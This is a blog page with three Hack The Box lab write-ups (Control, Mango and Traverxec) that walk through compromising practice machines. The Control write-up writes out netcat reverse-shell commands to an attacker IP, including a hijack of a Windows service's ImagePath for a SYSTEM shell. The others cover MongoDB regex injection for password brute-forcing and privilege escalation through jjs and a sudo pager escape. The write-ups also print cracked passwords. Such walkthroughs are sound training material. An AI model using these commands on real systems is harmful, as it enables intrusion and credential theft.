Hack The Box - Control Writeup

System Summary



Initial Enumeration

Being it a windows box, let's start with enum4linux but no results:

So turn to nmap:

Standard enumeration (rpcclient, smbclient etc..) doesn't give any valuable result.

Also connecting to MySQL/MariaDB is not permitted.


So let's open the Web site...

There is an admin login page, or it should be, but there is a message stating that a Header is missing... and this header should be related to a proxy... Mmmh


Before firing up Burp, let's look through the source page index.php:


The red lines look interesting

So let's build our Burp Intruder setup like this:
- use Sniper attack type
- add the burp special symbols followed by : 192.168.4.28
- put just the proxy related  header in the payload creation (it will substitute the special symbols)



And then start the attack with results:

It seems that adding a custom header like X-Forwaded-For: 192.168.4.29 to the request, the web server replies with a full page and not with an error message.

Now we should add this header directly in every request by our browser. We can do it with Burp Proxy options:

And we can get to the admin URL:

This page gives has many sub links that are reached through POST requests.

Keep in mind that all requests must go through Burp, which has to add the custom Header X-Forwarded-For.

Initial Foothold

The pages that we can try to test for SQL Injection are the following
  • search_products.php
  • view_product.php
  • update_product.php
  • delete_product.php
  • create_product.php
  • create_category.php
  • update_category.php
  • delete_category.php
All the POST have a number of parameters, so let's go in Burp Proxy and save the request text into separate files.
Then we can use the file with sqlmap using -r option

After trying them, it seems that search_products.php is prone to SQL Injection
And it seems a pretty straightforward ' UNION injection

We can discover the table names with a query like:


With this injection

We can get three users (root, manager and hector) and three hashes


One of the hashes can be cracked with hashcat and rockyou:

Which should be the password for hector: l33th4x0rhector

But it doesn't seem working with usual tools like rpcclient, smbclient, WinRM...

So let's follow another path...

Why not uploading a crafted php file in c:\inetpub\wwwroot ?

This can the be called with an argument cmd to execute commands (below the result of command dir)

With this php "helper" we can execute arbitrary commands like

  • create c:\temp
  • xcopy  a nc.exe from remote share
  • execute this nc to open a reverse shell






So we now have a shell as iusr  (the user running IIS service) which has low level privileges.


User Flag

If we look in c:\users\ we find a home folder for user hector, but we have a password l33th4x0rhector from previous SQL Injection.

The next and obvious step is to run a shell as hector using his credential, but it's not that easy.
Direct commands such as "runas" and "psexec" require interaction or don't work properly: we have to user poowershell.

Let's open another listner on our local computer (10.10.16.78) listening on port 5555 .

Then open powershell on Control box, and run this sequence oc commands:

$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force

$Creds = New-Object  System.Management.Automation.PSCredential("Fidelity\Hector",$pass)

Invoke-Command -Computer Fidelity -Credential $Creds -ScriptBlock { cmd.exe "/c C:\temp\nc.exe -e c:\windows\system32\cmd.exe 10.10.16.78 5555" }

We then receive a shell as hector and can get the user flag


Root Flag

We're now in as hector and we can get his group membership

Nothing interesting, AFAIK.

After some digging in the system I came across the powershell history located in C:\users\hector\appdata\Roaming\microsoft\Windows\Powershell\PSReadline\

There are two hints that are related to registry section of Windows Service


 Indeed Hector has "Full Control" access to that part of the registry.


This means that hector can change the setup of services.

We have to look for services that execute .exe file that are not  svchost (we don't want to mess up with it)
With some powershell commands like

get-item HKLM:\SYSTEM\CurrentControlSet\services\*  2>$null|Get-ItemProperty -Name "ImagePath" 2>$null| select -property  PSChildName,"ImagePath" 2>$null| ?{$_.ImagePath -like "*.exe*" }
|?{$_.ImagePath -NotLike "*svchost.exe*" } | ft

  • PSChildName is important because we use it to reference the service in sc.exe
  • ImagePath is important because it's the path of executable that the service runs.

This properties are already filter to only show services that has an executable ImagePath and excluding svchost.exe because we don't want to mess up the system


PSChildName is important because we use it to reference the service in sc.exe tool
ImagePath is important because it's the path of executable that the service runs.

By extracting the first column (name of the service) we can use "sc.exe query" to test the services hector has access to (manually or scripted way)

It happens that hector has lots of access denied except for a few services (AppVClient, EFS, MSDTC, RSoPProv, sppsvc...)

We

We can therefore choose one of these services and see its running state:



We can use a powershell command get-item to get full configuration EFS service (there is a reason I chose EFS, see later).
When it is started it run lsass.exe

We can change the ImagePath to another value that can be more useful for us, like a netcat shell on port 6666

set-itemproperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\EFS" -Name "ImagePath" -Value "c:\temp\ncat.exe 10.10.16.78 6666 -e c:\windows\system32\cmd.exe" 

And then check the setup is changed with get-item command:

I chose EFS after some testing: some other services were already running (not willing to mess with them), others had a windows security protection: I was able to change their ImagePath, but as soon as I started them Windows terminated them immediately with an
"Error 577: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a filed that was signed incorrectly or damaged, or that might be malicious software from an unknown source."

Luckily EFS is not affected by this "signing protection"

Now it's time to open a listener on port 6666 on our local machine..

Start the EFS service with:

If everything goes well, we should get back a shell as "NT authority\system" and get the root flag:




By - No comments:

Hack The Box - Mango Writeup

System Summary



Initial Enumeration


The nmap scan shows that there are only SSH, HTTP and HTTPS ports open.

Connecting to the website using HTTPS we receive a warning SSL certificate: it discloses the hostname staging-order.mango.htb

Adding the hostname to our hosts file we can connect and we see a login form.


Trying with bruteforcing gives no valuable result. 
Also SQLmap for injection, but it seemed not vulnerable.

We can then check for other backend database and, since the name of the box is mango, mongoDB looks a good candidate

Initial foothold

The injection in mongoDB is explained here

The basic idea is to subvert the parameter passed by the URL: instead of numeric or string values we want to pass objects like array.
In the standard POST request we normally pass three parameters
username=admin&password=pass&login=login

Think what happens if we choose to pass a different thing like
username=admin&password[$regex]=something&login=login
where "something" is a valid regular expression, the application will behave in different ways 

Let's use a ".*"  regex (Burp repeater is very helpful) and see:


We get a HTTP 302 reply

Now use a "A.*" as regex:

And we get a HTTP 200

What's the difference?
  • .* will match any password 
  • A.* will only match a password that start with A

So the reply 302 can be used to find password by repeating the POST request  with different values

For this fase we can choose either to script or to use Burp Intruder module.
We'll proceed with the Burp Intruder
  • attack type is Sniper 
  • payload is bruteforce with length 1
  • Charater set: all alphabet



The attack result is this one:
We see that we can fined the characters that  set that is: {c, t, 0, 2, 3, 9}
With a similar approach we have to test capital letters and we find {B, K, S}
Also for special characters and we find {!, #, $, ^, >, \, .}

An important note here is that some special character has a special meaning in regex ($ \ . ^)so we may have found some false positive:

  • ^ is start of line
  • $ is end of line
  • . is "any character"
  • \ is escape simbol

They can be matched in the regex but only by escaping them with a prepended \.
The best option is to exclude them from the alphabet until and check for them separately

Now we have the components  of the password {c, t, 0, 2, 3, 9, B, K, S, !, #, > } but we don't have them in the order.

The regex to check the first character is  


username=admin&password[$regex]=^§§.*&login=login

  • ^ means start of line
  • §§ is the Burp payload
  • .* is the remaing part of the password



We have this result:

So (discarding the space), we should have only one "302" reply, that corresponds to t character
The first character of the password becomes t

The next attack string is now (note the added t as first character)


    username=admin&password[$regex]=^t§§.*&login=login
    And we get:
    So the second character of the password is 9
    The next attack string is 
    username=admin&password[$regex]=^t9§§.*&login=login

    looping this attack we can get the password of Admin:  t9KcS3>!0B#2

    Using the same approach to username we can discover additionally user and password

    • User: mango
    • Password: h3mXK8RhU~f{]f5H  
    In this case escaping may be needed inthe attacking regexp, like (note the backslah)
    username=admin&password[$regex]=^h3mXK8rhU\§§.*&login=login

    With SSH we find that user mango is valid and we have an initial access.


    User Flag

    As user mango there is no user flag, but the passwd file shows an admin user.
    We can su and get the flag:


    Root flag


    Using standard enumeration tools (LinEnum or similar)  we can find a SUID file name jjs which is part of Java package.

    This can be user to execute inline scripts and it can be used to read files, execute files, etc.. as explained here: https://gtfobins.github.io/gtfobins/jjs/

    We can steal the root flag by reading its content:

    Where the number are the decimal ASCII code of the character (56 -> 8, 97 -> a, etc....)

    The root flag is then 8a8ef79a7a2fbb01ea81688424e9ab15


    it is an interactive interpereter that can be use to

    By - No comments:

    Hack The Box - Traverxec Writeup

    System Summary


    Initial Foothold

    An initial scan reveals ssh and http port open.

    The web server is not the usual apache, IIS or nginx but Nostromo 1.9.6
    There is a publicly disclosed RCE (CVE-2019-16278) that is already included in Metasploit framework (multi/http/Nostromo_code_exec) and it's really easy to run it:

    So we’re in as www-data user

    User Escaation

    Looking for some juicy files ew can easily find the Nostromo config with an htpasswd file:


    Now decrypting with john and rockyou (it takes a few minutes):


    The password is Nowonly4me but it doesn’t work for ssh, or su: it’s definitely a rabbit hole…

    The next step is to look for the user folders (http://10.10.10.165/~david) but it seems that there is an index.html and no directory listing.





    But there is also last line with a public folder named  “public_www”.
    So let’s try to look for it in David home:


    The backup file is quite interesting and I transferred it to my local machine with netcat (don’t want to copy in /tmp and leave it to other people 😊
    From the tgz file we can get the .ssh folder of David with an id_rsa.
    Let’s convert and unlock using ssh2john, john and rockyou.txt



    The passphrase of the ssh key is hunter and we can use it to connect as user david and get the user flag


    Root escalation

    Looking at David home there is an interesting folder named bin:


    Now the server-stats.sh script contains a sudo command that executes without authentication:

    An interesting behavior of sudo is that it executes a “pager” application when the terminal session is not able to show the full output of command.
    Usually it’s less command (or more, vi, or other depending on some environment variable that are defined)
    So if we resize the terminal to a windows less than 5 lines high, sudo will show the output with less.
    And this less command will be executed as root.
    In that less session we can execute commands by using ! followed by the command

    Let’s resize the window and then run the sudo command



    The output is longer than the window height.
    Execution will stop and show the output inside a less session:

    We can then run any command by using the command mode of less with !bin/bash


    And now:


    So root flag is:    9aa36a6d76f785dfd320a478f6e0d906

    By - No comments:
    Subscribe to: Posts (Atom)